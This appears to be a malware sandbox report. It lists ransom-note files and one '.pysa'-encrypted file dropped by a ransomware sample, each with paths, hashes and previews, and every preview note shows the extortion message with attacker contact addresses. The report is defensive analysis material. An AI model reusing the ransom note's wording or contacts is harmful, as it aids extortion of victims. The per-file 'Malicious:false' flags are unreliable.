                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetHistory\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\RoamingState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\settings.dat.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.662562767085945
                  Encrypted:false
                  SSDEEP:192:scqJV+jWJTOHQJH2Tq2pBuzk6eWSsAXVG2MdKVfQ0pczqk:aJYBzYk6emA826KVfQ0pcmk
                  MD5:40EE33AC89142393BFC60844CC1F7D75
                  SHA1:D9BFF934D0D29710D78D072C3E5C0AC9ABB27A30
                  SHA-256:60D6B048DBC8091BFC3ABE16D812CE6F220B2F2524B26478EA8FE902F2849C01
                  SHA-512:AD25D2AD139AD5E4B45B8BA48CFF4D5818675F03D8AA445A49886C13BFFD4707A5BA3C0D7F533F688595B0C5CB82DB931A7259CD525FF9725A94731D7631A535
                  Malicious:false
                  Preview: .4`....9'...B.*g7.w..+9E..&3.I..%......R..q...89!)[W0....F...g.......p.1...........T.7~7......!..T...;9*`d.*I....&...pd"9.m(a.........m........a..b..HI.tW.=A.......t....`R....~.Y\.!Z..4..Z..*...D.E...>..i.RD7>.9%..a..b......"Y..?2.~.3.v....R.]....6..........M.]f6.(.v....<g&..t..Y/....~..Z!O.....sa7.YE..:.:.2...M%..qXZ..G..wa.V..B.9gl+S..v/.0..?...O.6[..3..n...*.........7.-..=...\.k."..v.!7~4..^....U.5.~....#....`6.....w..../V.,.`.W.RRc.mR]...... 5..9w.).}../.9.V...C...._k.6gS.nG<.@@...r..IVi..i....@i.........X..:.+.\.......D.....:..lFA....34....<.a..Dr.9..l.. ..r.V....}:.......>\@......{..\.....m....:.}c.....'....F.@..j.:.U,:....Q.-%u5...O0..<. ./kn.|.Y'. .S#.T..2...s..x.B8\0.m.}."4P.Q..x0ra....I..^..-.\.9..>.~8J(..'?......9H 5.0V....{....dA4..p(.1`..).(.>..L...+.,^ntX.h.[.....l...9......k.[...n.f.st.2.w]..sS.C...#...w`.NF?.X...l_..vf`niT@...j.y.:.a...V....,.....&....b..<ZVL3E3[L`B...td.^{......a<z4...`........q/..p..s}....n.e...`l.a......q.d.Fg...=
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\SystemAppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\TempState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AC\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AC\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AC\INetHistory\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AC\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\LocalCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
